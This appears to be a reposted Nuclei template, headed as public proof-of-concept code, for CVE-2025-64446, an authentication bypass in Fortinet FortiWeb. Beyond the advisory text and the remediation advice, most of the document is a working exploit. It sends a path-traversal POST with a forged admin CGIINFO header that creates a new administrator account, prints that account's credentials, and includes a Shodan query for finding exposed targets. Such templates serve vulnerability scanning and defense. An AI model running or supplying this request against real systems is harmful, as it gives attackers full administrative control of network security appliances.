A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.
PoC代码[已公开]
id: CVE-2025-64446
info:
name: FortiWeb - Authentication Bypass
author: DhiyaneshDk,watchTowr,rapid7,defusedcyber
severity: critical
description: |
A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.
impact: |
Attackers can execute administrative commands remotely, potentially leading to full system compromise.
remediation: |
Update to the latest FortiWeb version beyond 8.0.1.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-64446
- https://x.com/defusedcyber/status/1975242250373517373
- https://github.com/watchtowrlabs/watchTowr-vs-Fortiweb-AuthBypass
- https://github.com/rapid7/metasploit-framework/pull/20698/files
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-64446
epss-score: 0.36021
epss-percentile: 0.96909
cwe-id: CWE-23
cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"FortiWeb - "
tags: cve,cve2025,vuln,fortiweb,fortigate,intrusive,auth-bypass,kev,vkev
variables:
username: "{{to_lower(rand_text_alpha(8))}}"
password: "{{to_lower(rand_text_alpha(8))}}"
http:
- raw:
- |
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: {{Hostname}}
CGIINFO: eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==
Content-Type: application/json
{
"data": {
"q_type": 1,
"name": "{{username}}",
"access-profile": "prof_admin",
"access-profile_val": "0",
"last-name": "",
"first-name": "",
"email-address": "",
"phone-number": "",
"mobile-number": "",
"hidden": 0,
"comments": "",
"sz_dashboard": -1,
"type": "local-user",
"type_val": "0",
"admin-usergrp_val": "0",
"wildcard_val": "0",
"accprofile-override_val": "0",
"sshkey": "",
"trusthostv4": "127.0.0.1/8",
"trusthostv6": "::1/128",
"passwd-set-time": 0,
"history-password-pos": 0,
"history-password0": "",
"history-password1": "",
"history-password2": "",
"history-password3": "",
"history-password4": "",
"history-password5": "",
"history-password6": "",
"history-password7": "",
"history-password8": "",
"history-password9": "",
"force-password-change": "disable",
"force-password-change_val": "0",
"password": "{{password}}"
}
}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"results":'
- '"can_clone":'
condition: and
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- '"USERNAME: "+ username'
- '"PASSWORD: "+ password'
# digest: 4a0a00473045022100eaa0faa4bcf43a6aa1bd85cd3feb1540f18d49e19d507d810c3f2596d20dc4d402200aa1690e87493c4a0b906f0b62081639fba9fb0bcb60c4384e9253d59c03226c:922c64590222798bb761d5b6d8e72950